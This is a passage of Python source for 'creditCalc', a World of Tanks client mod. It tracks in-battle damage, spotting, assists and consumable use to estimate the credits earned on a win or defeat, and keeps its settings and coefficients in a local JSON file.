p__BigWorld.oldskoolCore except Exception: oldskoolCore = False oldskoolCore = False class flashInHangar(): def __init__(self): g_eventBus.addListener(events.ComponentEvent.COMPONENT_REGISTERED, self.__componentRegisteringHandler, scope=EVENT_BUS_SCOPE.GLOBAL) g_eventBus.addListener(events.AppLifeCycleEvent.INITIALIZED, self.__onAppInitialized, scope=EVENT_BUS_SCOPE.GLOBAL) g_entitiesFactories.addSettings(ViewSettings('creditCalc', FlashMeta, 'creditCalc.swf', ViewTypes.WINDOW, None, ScopeTemplates.GLOBAL_SCOPE)) self.onHeaderUpdate = Event.Event() self.onHangarLoaded = Event.Event() self.setPosition = Event.Event() self.setBackground = Event.Event() self.setText = Event.Event() def __onAppInitialized(self, event): if event.ns == APP_NAME_SPACE.SF_LOBBY: app = ServicesLocator.appLoader.getApp(event.ns) if app is None: return app.loadView(SFViewLoadParams('creditCalc')) def __componentRegisteringHandler(self, event): if event.alias == HANGAR_ALIASES.AMMUNITION_PANEL: if not p__config.p__data['hangar_show']: return self.setPosition(p__config.p__data['hangar_x'], p__config.p__data['hangar_y']) # x and y self.setBackground(p__config.p__data['battle_background'], '0x000000', 0.4) # change to false if dont want # self.setText('Test Test Test') # text class 
FlashMeta(View): def _populate(self): super(FlashMeta, self)._populate() p__flashInHangar.setText += self._setText p__flashInHangar.setPosition += self._setPosition p__flashInHangar.setBackground += self._setBackground def _dispose(self): super(FlashMeta, self)._dispose() def py_newPos(self, posX, posY): p__config.p__data['hangar_x'] = posX p__config.p__data['hangar_y'] = posY p__config.p__apply(p__config.p__data) def _setText(self, text): if self._isDAAPIInited(): self.flashObject.as_setText(text) def _setPosition(self, x, y): if self._isDAAPIInited(): self.flashObject.as_setPosition(x, y) def _setBackground(self, enabled, bgcolor, alpha): if self._isDAAPIInited(): self.flashObject.as_setBackground(enabled, bgcolor, alpha) p__CHASSIS_ALL_ITEMS = frozenset(VEHICLE_DEVICE_IN_COMPLEX_ITEM.keys() + VEHICLE_DEVICE_IN_COMPLEX_ITEM.values()) p__DAMAGE_EVENTS = frozenset([p__BATTLE_EVENT_TYPE.RADIO_ASSIST, p__BATTLE_EVENT_TYPE.TRACK_ASSIST, p__BATTLE_EVENT_TYPE.STUN_ASSIST, p__BATTLE_EVENT_TYPE.DAMAGE, p__BATTLE_EVENT_TYPE.TANKING, p__BATTLE_EVENT_TYPE.RECEIVED_DAMAGE]) p__DEBUG = True p__DEBUG_COEFF = True class p__Config(object): def __init__(self): self.p__ids = 'creditCalc' self.author = 'www.b4it.org' self.version = 'v2.07 (2021-07-10)' self.version_id = 207 self.p__versionI18n = 3400 lang = p__getLanguageCode().lower() self.p__data = { 'version' : self.version_id, 'enabled' : True, 'battle_x' : 60, 'battle_y' : -252, 'hangar_x' : 325.0, 'hangar_y' : 505.0, 'battle_background': True, 'battle_show' : True, 'hangar_background': True, 'hangar_show' : True, } self.p__i18n = { 'version' : self.p__versionI18n, 'UI_description' : 'creditCalc', 'UI_setting_label_text' : 'Calc Credits in Battle, +1000 or -1000 silver difference: that\'s normal dispersion, if greater: Play one battle without damage.', 'UI_setting_label_tooltip' : '', 'UI_setting_label1_text' : 'Wait until the battle is complete without escape into the hangar. Income: Green Victory, Red Defeat, Outcome: ammo and consumables.', 'UI_setting_label1_tooltip' : '', 'UI_setting_label2_text' : 'Additional info in battle: Press Alt and Control buttons', 'UI_setting_label2_tooltip' : '', 'UI_setting_battleBackground_text' : 'Background in battle', 'UI_setting_battleBackground_tooltip': '', 'UI_setting_hangarBackground_text' : 'Background in hangar', 'UI_setting_hangarBackground_tooltip': '', 'UI_setting_battleShow_text' : 'Show in hangar', 'UI_setting_battleShow_tooltip' : '', 'UI_setting_hangarShow_text' : 'Show in battle', 'UI_setting_hangarShow_tooltip' : '', } if 'ru' in lang: self.p__i18n.update({ 'UI_setting_label_text' : 'Калькуляция серебра в бою, +1000 или -1000 разницы: Нормальный разброс, если разброс больше, проведите один бой без урона', 'UI_setting_label_tooltip' : '', 'UI_setting_label1_text' : 'Дождитесь завершения боя без выхода в ангар. 
Доход: Зеленый победа, Красный поражение, Расходы: цена снарядов и расходников', 'UI_setting_label1_tooltip' : '', 'UI_setting_label2_text' : 'Дополнительная информация в бою: Нажмите кнопки АЛЬТ и КОНТРОЛ', 'UI_setting_label2_tooltip' : '', 'UI_setting_battleBackground_text' : 'Задний фон в бою', 'UI_setting_battleBackground_tooltip': '', 'UI_setting_hangarBackground_text' : 'Задний фон в ангаре', 'UI_setting_hangarBackground_tooltip': '', 'UI_setting_battleShow_text' : 'Показывать в ангаре', 'UI_setting_battleShow_tooltip' : '', 'UI_setting_hangarShow_text' : 'Показывать в бою', 'UI_setting_hangarShow_tooltip' : '', }) if 'cn' in lang or 'zh' in lang: self.p__i18n.update({ "UI_description" : "银币收益计算", "UI_setting_battleBackground_text" : "在战斗中的消耗", "UI_setting_battleBackground_tooltip": "", "UI_setting_battleShow_text" : "在机库中显示", "UI_setting_battleShow_tooltip" : "", "UI_setting_hangarBackground_text" : "机库的背景", "UI_setting_hangarBackground_tooltip": "", "UI_setting_hangarShow_text" : "显示在战斗中", "UI_setting_hangarShow_tooltip" : "", "UI_setting_label1_text" : "等到战斗结束返回到机库. 收益:绿色为胜利, 红色为失败, 结果: 弹药和消耗品.", "UI_setting_label1_tooltip" : "", "UI_setting_label2_text" : "战斗中的详细情报:按Alt和Control按钮", "UI_setting_label2_tooltip" : "", "UI_setting_label_text" : "在战斗中的得分, +1000或-1000银币差额: 这是正常的分数, 如果更好的: 发挥战斗造成损伤.", "UI_setting_label_tooltip" : "", }) if p__g_gui: self.p__data, self.p__i18n = p__g_gui.register_data(self.p__ids, self.p__data, self.p__i18n, 'www.b4it.org') p__g_gui.register(self.p__ids, self.p__template, self.p__data, self.p__apply) print '[LOAD_MOD]: [%s %s, %s]' % (self.p__ids, self.version, self.author) def p__template(self): return { 'modDisplayName' : self.p__i18n['UI_description'], 'settingsVersion': self.version_id, 'enabled' : self.p__data['enabled'], 'column1' : [ { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_hangarShow_text'], 'value' : self.p__data['hangar_show'], 'tooltip': self.p__i18n['UI_setting_battleShow_tooltip'], 'varName': 'hangar_show' }, { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_battleShow_text'], 'value' : self.p__data['battle_show'], 'tooltip': self.p__i18n['UI_setting_battleShow_tooltip'], 'varName': 'battle_show' }, { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_hangarBackground_text'], 'value' : self.p__data['hangar_background'], 'tooltip': self.p__i18n['UI_setting_battleBackground_tooltip'], 'varName': 'hangar_background' }, { 'type' : 'CheckBox', 'text' : self.p__i18n['UI_setting_battleBackground_text'], 'value' : self.p__data['battle_background'], 'tooltip': self.p__i18n['UI_setting_battleBackground_tooltip'], 'varName': 'battle_background' }, { 'type' : 'Label', 'text' : self.p__i18n['UI_setting_label_text'], 'tooltip': self.p__i18n['UI_setting_label_tooltip'], }, { 'type' : 'Label', 'text' : self.p__i18n['UI_setting_label1_text'], 'tooltip': self.p__i18n['UI_setting_label1_tooltip'], }, { 'type' : 'Label', 'text' : self.p__i18n['UI_setting_label2_text'], 'tooltip': self.p__i18n['UI_setting_label2_tooltip'], } ], 'column2' : [] } def p__apply(self, settings): if p__g_gui: self.p__data = p__g_gui.update_data(self.p__ids, settings, 'www.b4it.org') p__g_gui.update(self.p__ids, self.p__template) class p__MyJSONEncoder(p__json.JSONEncoder): def __init__(self, *args, **kwargs): super(p__MyJSONEncoder, self).__init__(*args, **kwargs) self.current_indent = 0 self.current_indent_str = "" self.indent = 4 def encode(self, o): # Special Processing for lists if isinstance(o, (list, tuple)): primitives_only = True for item in o: if 
isinstance(item, (list, tuple, dict)): primitives_only = False break output = [] if primitives_only: for item in o: output.append(p__json.dumps(item, ensure_ascii=False, encoding='utf-8-sig')) return "[ " + ", ".join(output) + " ]" else: self.current_indent += self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) for item in o: output.append(self.current_indent_str + self.encode(item)) self.current_indent -= self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) return "[\n" + ",\n".join(output) + "\n" + self.current_indent_str + "]" elif isinstance(o, dict): output = [] self.current_indent += self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) for key, value in o.iteritems(): output.append(self.current_indent_str + p__json.dumps(key, ensure_ascii=False, encoding='utf-8-sig') + ": " + self.encode(value)) self.current_indent -= self.indent self.current_indent_str = "".join([" " for x in range(self.current_indent)]) return "{\n" + ",\n".join(output) + "\n" + self.current_indent_str + "}" else: return p__json.dumps(o, ensure_ascii=False, encoding='utf-8-sig') class p__CreditsCalculator(object): def __init__(self): self.p__coeffTable() self.p__COEFFICIENTS['USE_DATA'] = False self.p__AVERAGES = [(1.37, 1.37), (1.13, 1.28), (1.04, 1.35), (1.029, 1.42), (1.04, 1.5), (0.92, 1.3), (0.82, 1.4), (0.75, 1.5), (0.72, 0.72), (0.71, 0.72)] self.p__coeffDefaults = [0.53, 0.583, 0.6, 0.605, 0.62, 0.625, 0.63, 0.632, 0.633, 0.64, 0.65, 0.659, 0.66, 0.67, 0.6745, 0.68, 0.69, 0.7, 0.702, 0.708, 0.71, 0.711, 0.715, 0.72, 0.721, 0.724, 0.725, 0.73, 0.732, 0.734, 0.735, 0.745, 0.75, 0.751, 0.752, 0.753, 0.756, 0.759, 0.76, 0.764, 0.77, 0.774, 0.776, 0.777, 0.779, 0.78, 0.782, 0.783, 0.787, 0.788, 0.79, 0.791, 0.793, 0.795, 0.797, 0.798, 0.8, 0.802, 0.804, 0.805, 0.817, 0.82, 0.824, 0.825, 0.828, 0.83, 0.835, 0.836, 0.84, 0.847, 0.85, 0.854, 0.858, 0.861, 0.865, 0.868, 0.873, 0.874, 0.88, 0.883, 0.892, 0.894, 0.899, 0.9, 0.901, 0.906, 0.907, 0.909, 0.912, 0.9125, 0.915, 0.918, 0.922, 0.925, 0.928, 0.93, 0.931, 0.932, 0.935, 0.943, 0.945, 0.95, 0.964, 0.968, 0.969, 0.975, 0.976, 0.98, 0.987, 0.99, 0.997, 1.0, 1.0044, 1.0074, 1.012, 1.018, 1.02, 1.025, 1.026, 1.03, 1.0336, 1.044, 1.045, 1.046, 1.05, 1.053, 1.057, 1.07, 1.077, 1.08, 1.085, 1.086, 1.088, 1.089, 1.09, 1.0902, 1.093, 1.094, 1.1, 1.102, 1.104, 1.108, 1.109, 1.11, 1.113, 1.115, 1.12, 1.122, 1.127, 1.128, 1.129, 1.14, 1.1425, 1.15, 1.154, 1.1585, 1.168, 1.17, 1.1782, 1.18, 1.199, 1.2, 1.21, 1.219, 1.22, 1.25, 1.253, 1.2558, 1.26, 1.27, 1.276, 1.3, 1.311, 1.3145, 1.33, 1.35, 1.36, 1.365, 1.38, 1.4, 1.419, 1.43, 1.437, 1.44, 1.445, 1.45, 1.46, 1.4734, 1.48, 1.485, 1.49, 1.5, 1.52, 1.53, 1.55, 1.56, 1.57, 1.575, 1.59, 1.6, 1.62, 1.63, 1.637, 1.64, 1.65, 1.67, 1.75, 1.81] resMgr = p__ResMgr.openSection('../version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('./version.xml') ver = 'temp' if resMgr is None else resMgr.readString('version') i1 = ver.find('.') i2 = ver.find('#') self.p__PATH = ''.join(['./res_mods/', ver[i1 + 1:i2 - 1], '/system/']) self.p__readJson() self.p__PREMIUM_ACC = self.p__COEFFICIENTS['USE_DATA'] self.p__iconCredits = '<img src=\"img://gui/maps/icons/quests/bonuses/big/credits.png\" vspace=\"-7\" width=\"20\" height=\"20\" />' self.p__textWin = '' self.p__textDEFEAT = '' self.p__tempResults = {} self.p__item = None self.p__altMode = False self.p__ctrlMode = 
False self.p__hangarOutcome = 0 self.p__hangarItems = {} self.p__hangarAmmo = {} self.p__killed = False self.p__repairCost = 0 self.p__costRepairs = {} self.p__usedItems = {} self.p__hangarHeader = '' def p__byte_ify(self, p__inputs): if p__inputs: if isinstance(p__inputs, dict): return {self.p__byte_ify(key): self.p__byte_ify(value) for key, value in p__inputs.iteritems()} elif isinstance(p__inputs, list): return [self.p__byte_ify(element) for element in p__inputs] elif isinstance(p__inputs, unicode): return p__inputs.encode('utf-8') else: return p__inputs return p__inputs def p__writeJson(self): if not p__os.path.exists(self.p__PATH): p__os.makedirs(self.p__PATH) with p__codecs.open(self.p__PATH + 'sw_templates.json', 'w', encoding='utf-8-sig') as p__json_file: p__data = p__json.dumps(p__collections.OrderedDict(sorted(self.p__COEFFICIENTS.items(), key=lambda t: t[0])), sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '), cls=p__MyJSONEncoder) p__json_file.write('%s' % self.p__byte_ify(p__data)) p__json_file.close() def p__readJson(self): if p__os.path.isfile(self.p__PATH + 'sw_templates.json'): try: with p__codecs.open(self.p__PATH + 'sw_templates.json', 'r', encoding='utf-8-sig') as p__json_file: p__data = p__json_file.read().decode('utf-8-sig') self.p__COEFFICIENTS.update(self.p__byte_ify(p__json.loads(p__data))) p__json_file.close() except Exception as e: self.p__writeJson() else: self.p__writeJson() def p__getHangarData(self, isPremium): if self.p__COEFFICIENTS['USE_DATA'] != isPremium: self.p__COEFFICIENTS['USE_DATA'] = isPremium self.p__writeJson() self.p__PREMIUM_ACC = isPremium # outcomeFull = 0 outcome = 0 for installedItem in p__g_currentVehicle.item.battleBoosters.installed.getItems(): price = installedItem.buyPrices.getSum().price.credits # outcomeFull += price if not installedItem.inventoryCount else installedItem.getSellPrice().price.credits outcome += price if not installedItem.inventoryCount else 0 self.p__hangarOutcome = outcome self.p__hangarItems = {} for installedItem in p__g_currentVehicle.item.consumables.installed.getItems(): price = installedItem.buyPrices.getSum().price.credits self.p__hangarItems[installedItem.intCD] = [price if not installedItem.inventoryCount else 0, price if not installedItem.inventoryCount else installedItem.getSellPrice().price.credits] self.p__hangarAmmo = {} for ammo in p__g_currentVehicle.item.gun.defaultAmmo: self.p__hangarAmmo[ammo.intCD] = [ammo.buyPrices.getSum().price.credits if not ammo.inventoryCount else ammo.getSellPrice().price.credits, 0, 0] if p__DEBUG or p__DEBUG_COEFF: if p__g_currentVehicle.item: if self.p__item == p__g_currentVehicle.item.descriptor.type.compactDescr: return vehicleCompDesc, balanceCoeff = self.p__deCode(p__g_currentVehicle.item.descriptor.type.compactDescr) if not balanceCoeff: ids = 1 if 'premium' in p__g_currentVehicle.item.tags else 0 balanceCoeff = self.p__AVERAGES[p__g_currentVehicle.item.level - 1][ids] text = '<b> {0} calcCredits {1} {0}\n '.format(icons.nutStat() * 3, 'to <font color=\"#6595EE\">oldskool.vip</font>' if oldskoolCore else 'by <font color=\"#6595EE\">www.b4it.org</font>') text += icons.makeImageTag(Vehicle.getTypeSmallIconPath(p__g_currentVehicle.item.type, p__g_currentVehicle.item.isPremium), width=30, height=30, vSpace=-7 if p__g_currentVehicle.item.isPremium else -5) + p__g_currentVehicle.item.shortUserName text += ' : %s %s%s%% %s</b>' % (icons.creditsBig(), 'coeff:', round(balanceCoeff * 100, 2), '') self.p__hangarHeader = text 
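# --- Illustrative sketch, not part of the original mod ----------------------
# p__writeJson / p__readJson above persist the coefficient table to
# <res_mods>/<client version>/system/sw_templates.json using the utf-8-sig
# codec, and p__byte_ify recursively turns the unicode objects returned by
# json.loads back into byte strings (this file targets Python 2.7).  Below is
# a minimal, self-contained restatement of that read/update/write cycle; the
# helper names are hypothetical and the custom p__MyJSONEncoder / byte_ify
# handling is omitted for brevity.
import codecs
import json
import os

def _load_table(path):
    # Returns an empty table when the JSON file does not exist yet.
    if not os.path.isfile(path):
        return {}
    with codecs.open(path, 'r', encoding='utf-8-sig') as fp:
        return json.loads(fp.read())

def _save_table(path, table):
    # Create the target folder on first write, then dump the table sorted by
    # key, mirroring the sort_keys/indent arguments used in p__writeJson.
    folder = os.path.dirname(path)
    if folder and not os.path.exists(folder):
        os.makedirs(folder)
    with codecs.open(path, 'w', encoding='utf-8-sig') as fp:
        fp.write(json.dumps(table, sort_keys=True, indent=4, ensure_ascii=False))
# ---------------------------------------------------------------------------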
self.p__hangarMessage() self.p__item = p__g_currentVehicle.item.descriptor.type.compactDescr def p__timer(self): player = p__BigWorld.player() vehicle = player.getVehicleAttached() if vehicle: self.p__startBattle() return p__BigWorld.callback(0.1, self.p__timer) def p__code(self, p__compactDescr, p__balanceCoeff): test = '%s' % (p__compactDescr * 2847 * 122) self.p__COEFFICIENTS[test] = int(round(p__balanceCoeff * 10000.0)) * 1231 * 487 self.p__writeJson() return test, self.p__COEFFICIENTS[test] def p__deCode(self, p__compactDescr): test = '%s' % (p__compactDescr * 2847 * 122) if test in self.p__COEFFICIENTS: return test, round(self.p__COEFFICIENTS[test] / 1231 / 487 * 0.0001, 6) return test, 0.0 def p__startBattle(self): self.p__altMode = False self.p__ctrlMode = False player = p__BigWorld.player() p__InputHandler.g_instance.onKeyDown += self.p__keyPressed p__InputHandler.g_instance.onKeyUp += self.p__keyPressed player.arena.onVehicleKilled += self.p__onVehicleKilled # if player.guiSessionProvider.shared.vehicleState is not None: # player.guiSessionProvider.shared.vehicleState.onVehicleStateUpdated += self.p__deviceTouched ammoCtrl = player.guiSessionProvider.shared.ammo if ammoCtrl is not None: ammoCtrl.onShellsAdded += self.p__onShellsAdded ammoCtrl.onShellsUpdated += self.p__onShellsUpdated p__flash.p__startBattle() p__flash.p__visible(False) vehicle = player.getVehicleAttached() self.p__costRepairs.update({ 'gun' : vehicle.typeDescriptor.gun.maxRepairCost, 'engine' : vehicle.typeDescriptor.engine.maxRepairCost, 'turretRotator' : vehicle.typeDescriptor.turret.turretRotatorHealth.maxRepairCost, 'surveyingDevice': vehicle.typeDescriptor.turret.surveyingDeviceHealth.maxRepairCost, 'ammoBay' : vehicle.typeDescriptor.hull.ammoBayHealth.maxRepairCost, 'radio' : vehicle.typeDescriptor.radio.maxRepairCost, 'fuelTank' : vehicle.typeDescriptor.fuelTank.maxRepairCost, 'chassis' : vehicle.typeDescriptor.chassis.maxRepairCost }) self.p__costRepairs.update({name: vehicle.typeDescriptor.chassis.maxRepairCost for name in p__CHASSIS_ALL_ITEMS}) if not self.p__hangarItems: self.p__hangarItems = {763: (3000, 3000), 1019: (20000, 20000), 1275: (3000, 3000), 1531: (20000, 20000), 1787: (5000, 5000), 4859: (20000, 20000), 4091: (20000, 20000), 2299: (20000, 20000), 2555: (20000, 20000), 3067: (20000, 20000), 251: (3000, 3000), 3323: (3000, 3000), 4347: (5000, 5000), 3579: (20000, 20000), 15867: (20000, 20000), 25851: (20000, 20000), 16123: (20000, 20000), 2043: (5000, 5000), 16379: (20000, 20000), 16635: (20000, 20000), 4603: (20000, 20000), 507: (20000, 20000)} self.p__usedItems = {} # vehicleName = player.guiSessionProvider.getCtx().getPlayerFullNameParts(vID=vehicle.id).vehicleName self.p__item = None self.p__name = vehicle.typeDescriptor.name self.p__vehicleName = player.guiSessionProvider.getCtx().getPlayerFullNameParts(vID=vehicle.id).vehicleName self.p__level = vehicle.typeDescriptor.level self.p__textWin = '' self.p__textDEFEAT = '' player = p__BigWorld.player() arenaDP = player.guiSessionProvider.getArenaDP() self.p__listAlly = p__vos_collections.AllyItemsCollection().ids(arenaDP) self.p__listAlly.remove(player.playerVehicleID) self.p__PREMIUM_ACC = self.p__COEFFICIENTS['USE_DATA'] self.p__readJson() self.p__SPOT = 0 self.p__ASSIST = 0 self.p__DAMAGE_SELF_SPOT = 0 # 100% sure we're spotting self.p__DAMAGE_OTHER_SPOT = 0 # 100% sure someone else is spotting self.p__DAMAGE_UNKNOWN_SPOT = 0 # uncertanty who is spotting self.p__DAMAGE_STUN = 0 self.p__DAMAGE_ASSIST = 0 self.p__WinResult = 0 
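# --- Illustrative sketch, not part of the original mod ----------------------
# p__code / p__deCode above obfuscate the per-vehicle balance coefficient
# before it is persisted: the dict key is the vehicle compactDescr multiplied
# by 2847 * 122, and the stored value is the coefficient scaled by 10000 and
# multiplied by 1231 * 487.  A standalone round-trip of that scheme (function
# names are hypothetical):
def _encode_coeff(compact_descr, balance_coeff):
    # Same key/value obfuscation as p__code.
    key = '%s' % (compact_descr * 2847 * 122)
    value = int(round(balance_coeff * 10000.0)) * 1231 * 487
    return key, value

def _decode_coeff(compact_descr, table):
    # Reverse of the scheme above, as in p__deCode; 0.0 means "unknown".
    key = '%s' % (compact_descr * 2847 * 122)
    if key in table:
        return key, round(table[key] / 1231 / 487 * 0.0001, 6)
    return key, 0.0

# Example round-trip: _decode_coeff(57, dict([_encode_coeff(57, 1.5)]))
# yields the same key together with the coefficient 1.5.
# ---------------------------------------------------------------------------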
self.p__WinResultMin = 0 self.p__DefeatResult = 0 self.p__DefeatResultMin = 0 self.p__premium = 1.5 if self.p__PREMIUM_ACC else 1.0 # точно! self.p__compactDescr, self.p__balanceCoeff = self.p__deCode(vehicle.typeDescriptor.type.compactDescr) if not self.p__balanceCoeff: ids = 1 if 'premium' in vehicle.typeDescriptor.type.tags else 0 self.p__balanceCoeff = self.p__AVERAGES[self.p__level - 1][ids] self.p__killed = False self.p__repairCost = 0 self.p__calc() def p__canSpotTarget(self, targetVehicle): distSq = (targetVehicle.position - p__BigWorld.player().getOwnVehiclePosition()).lengthSquared # assume we can spot target 100% sure at 100m or at 75% of our vision radius if distSq < 10000: return True circularVisionRadius = p__BigWorld.player().guiSessionProvider.shared.feedback.getVehicleAttrs()['circularVisionRadius'] if distSq < circularVisionRadius * circularVisionRadius * 0.75 * 0.75: return True return False def p__canNeverSpotTarget(self, targetVehicle): # we can's spot target outside of our vision radius distSq = (targetVehicle.position - p__BigWorld.player().getOwnVehiclePosition()).lengthSquared circularVisionRadius = p__BigWorld.player().guiSessionProvider.shared.feedback.getVehicleAttrs()['circularVisionRadius'] if distSq > circularVisionRadius * circularVisionRadius: return True return False def p__onBattleEvents(self, events): player = p__BigWorld.player() guiSessionProvider = player.guiSessionProvider radio = 0 track = 0 stun = 0 if guiSessionProvider.shared.vehicleState.getControllingVehicleID() == player.playerVehicleID: for p__data in events: feedbackEvent = p__feedback_events.PlayerFeedbackEvent.fromDict(p__data) eventType = feedbackEvent.getBattleEventType() targetID = feedbackEvent.getTargetID() if eventType == p__BATTLE_EVENT_TYPE.SPOTTED: vehicle = p__BigWorld.entity(targetID) self.p__SPOT += 1 if vehicle and 'SPG' in vehicle.typeDescriptor.type.tags: self.p__SPOT += 1 if eventType in p__DAMAGE_EVENTS: extra = feedbackEvent.getExtra() if extra: if eventType == p__BATTLE_EVENT_TYPE.RADIO_ASSIST: radio += extra.getDamage() if eventType == p__BATTLE_EVENT_TYPE.TRACK_ASSIST: track += extra.getDamage() if eventType == p__BATTLE_EVENT_TYPE.STUN_ASSIST: stun += extra.getDamage() if eventType == p__BATTLE_EVENT_TYPE.DAMAGE: arenaDP = guiSessionProvider.getArenaDP() if arenaDP.isEnemyTeam(arenaDP.getVehicleInfo(targetID).team): vehicle = p__BigWorld.entity(targetID) if vehicle: if vehicle.stunInfo > 0.0: self.p__DAMAGE_STUN += extra.getDamage() elif self.p__canSpotTarget(vehicle): self.p__DAMAGE_SELF_SPOT += extra.getDamage() elif self.p__canNeverSpotTarget(vehicle): self.p__DAMAGE_OTHER_SPOT += extra.getDamage() else: self.p__DAMAGE_UNKNOWN_SPOT += extra.getDamage() data = [radio, track, stun] self.p__ASSIST += max(data) self.p__calc() def p__deviceTouched(self, state, value): if self.p__killed: return player = p__BigWorld.player() ctrl = player.guiSessionProvider.shared vehicle = player.getVehicleAttached() # self.p__repairCost = int(vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth + vehicle.health) # getMaxRepairCost = vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth self.p__repairCost = 0 # int(round(getMaxRepairCost - getMaxRepairCost * vehicle.health / round(vehicle.typeDescriptor.maxHealth))) if state == VEHICLE_VIEW_STATE.DEVICES: # print 'max:%s, maxHP:%s, hp:%s' % (vehicle.typeDescriptor.getMaxRepairCost(), vehicle.typeDescriptor.maxHealth, vehicle.health) # print 'repairCost1:%s' % self.p__repairCost 
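# --- Illustrative sketch, not part of the original mod ----------------------
# p__onBattleEvents above splits the player's damage into buckets: damage to
# stunned targets goes to DAMAGE_STUN, and otherwise p__canSpotTarget /
# p__canNeverSpotTarget decide who is likely providing vision.  A hit counts
# as self-spotted when the target is within 100 m or within 75% of the
# player's circularVisionRadius, as spotted by an ally when it is beyond the
# vision radius, and as "unknown" in between.  A plain restatement of that
# distance test (scalar arguments instead of BigWorld entities; the function
# name is hypothetical):
def _classify_spotter(dist_sq, vision_radius):
    if dist_sq < 100.0 * 100.0 or dist_sq < (vision_radius * 0.75) ** 2:
        return 'self'      # accumulated into DAMAGE_SELF_SPOT
    if dist_sq > vision_radius ** 2:
        return 'other'     # accumulated into DAMAGE_OTHER_SPOT
    return 'unknown'       # accumulated into DAMAGE_UNKNOWN_SPOT
# ---------------------------------------------------------------------------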
self.p__repairCost = 0 repairs = 0 for equipment in ctrl.equipments.iterEquipmentsByTag('repairkit'): for itemName, deviceState in equipment[1].getEntitiesIterator(): if deviceState == 'destroyed': if itemName in self.p__costRepairs: # print 'module:%s, %s' % (itemName, deviceState) repairs += self.p__costRepairs[itemName] if deviceState == 'critical': if itemName in self.p__costRepairs: # print 'module:%s, %s' % (itemName, deviceState) repairs += self.p__costRepairs[itemName] / 2 self.p__repairCost += int(round(repairs)) # print 'modules:%s' %(repairs) # print 'repairCost2:%s' % self.p__repairCost # print 'repairCost3:%s' % int(round(self.p__repairCost * self.p__balanceCoeff)) self.p__calc() def p__onVehicleKilled(self, target_id, attacker_id, equipment_id, reason): player = p__BigWorld.player() vehicle = player.getVehicleAttached() if target_id == vehicle.id: self.p__killed = True self.p__calc() return # self.p__repairCost = int(vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth + vehicle.health) getMaxRepairCost = vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth self.p__repairCost = int(round(getMaxRepairCost - getMaxRepairCost * vehicle.health / round(vehicle.typeDescriptor.maxHealth))) ctrl = player.guiSessionProvider.shared repairs = 0 for equipment in ctrl.equipments.iterEquipmentsByTag('repairkit'): for itemName, deviceState in equipment[1].getEntitiesIterator(): if deviceState == 'destroyed': if itemName in self.p__costRepairs: repairs += self.p__costRepairs[itemName] if deviceState == 'critical': if itemName in self.p__costRepairs: repairs += self.p__costRepairs[itemName] / 2 self.p__repairCost += int(repairs) self.p__calc() def p__battleOutcome(self): player = p__BigWorld.player() ctrl = player.guiSessionProvider.shared # priceFull = self.p__hangarOutcome[1] price = self.p__hangarOutcome # + int(round(self.p__repairCost * self.p__balanceCoeff)) if not self.p__killed: try: for item in ctrl.equipments.getOrderedEquipmentsLayout(): if item and item[0] in self.p__hangarItems: prevQuantity = item[1].getPrevQuantity() quantity = item[1].getQuantity() if item[0] not in self.p__usedItems: self.p__usedItems[item[0]] = [not prevQuantity and quantity < 65535, self.p__hangarItems[item[0]][1], self.p__hangarItems[item[0]][1]] if prevQuantity > 0 and 1 < quantity < 65535: self.p__usedItems[item[0]][0] = True except Exception as e: pass # print self.p__usedItems for equipment in self.p__usedItems: if self.p__usedItems[equipment][0]: price += self.p__usedItems[equipment][1] for ammo in self.p__hangarAmmo: if self.p__hangarAmmo[ammo][1]: price += self.p__hangarAmmo[ammo][0] * self.p__hangarAmmo[ammo][1] return int(round(price)) def p__onShellsAdded(self, intCD, descriptor, quantity, _, gunSettings): if intCD in self.p__hangarAmmo: self.p__hangarAmmo[intCD][2] = quantity self.p__calc() def p__onShellsUpdated(self, intCD, quantity, *args): if intCD in self.p__hangarAmmo: self.p__hangarAmmo[intCD][1] = self.p__hangarAmmo[intCD][2] - quantity self.p__calc() def p__calc(self, hangar=False): if not p__config.p__data['enabled']: return if not (p__DEBUG or p__DEBUG_COEFF): return assistCoeff = 5 spotCoeff = 100 damageStunCoeff = 7.7 damageSpottedCoeff = 7.5 damageSelfCoeff = 10 defeatCredits = self.p__level * 700 winCredits = self.p__level * 1300 assistCredits = self.p__ASSIST * assistCoeff spotCredits = self.p__SPOT * spotCoeff stunCredits = self.p__DAMAGE_STUN * damageStunCoeff damageMinCredits = self.p__DAMAGE_SELF_SPOT * damageSelfCoeff + 
(self.p__DAMAGE_UNKNOWN_SPOT + self.p__DAMAGE_OTHER_SPOT) * damageSpottedCoeff damageMaxCredits = (self.p__DAMAGE_SELF_SPOT + self.p__DAMAGE_UNKNOWN_SPOT) * damageSelfCoeff + self.p__DAMAGE_OTHER_SPOT * damageSpottedCoeff outcomeCredits = self.p__battleOutcome() self.p__DefeatResult = int(int(self.p__balanceCoeff * int(defeatCredits + assistCredits + spotCredits + damageMaxCredits + stunCredits) - 0.5) * self.p__premium + 0.5) self.p__DefeatResultMin = int(int(self.p__balanceCoeff * int(defeatCredits + assistCredits + spotCredits + damageMinCredits + stunCredits) - 0.5) * self.p__premium + 0.5) self.p__WinResult = int(int(self.p__balanceCoeff * int(winCredits + assistCredits + spotCredits + damageMaxCredits + stunCredits) - 0.5) * self.p__premium + 0.5) self.p__WinResultMin = int(int(self.p__balanceCoeff * int(winCredits + assistCredits + spotCredits + damageMinCredits + stunCredits) - 0.5) * self.p__premium + 0.5) if not hangar and p__flash: textWinner = self.p__correctedText(self.p__WinResultMin, self.p__WinResult, outcomeCredits) textDefeat = self.p__correctedText(self.p__DefeatResult, self.p__DefeatResult, outcomeCredits) colorWin = '#80D639' colorDefeat = '#FF6347' self.p__textWin = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorWin, self.p__iconCredits, textWinner) 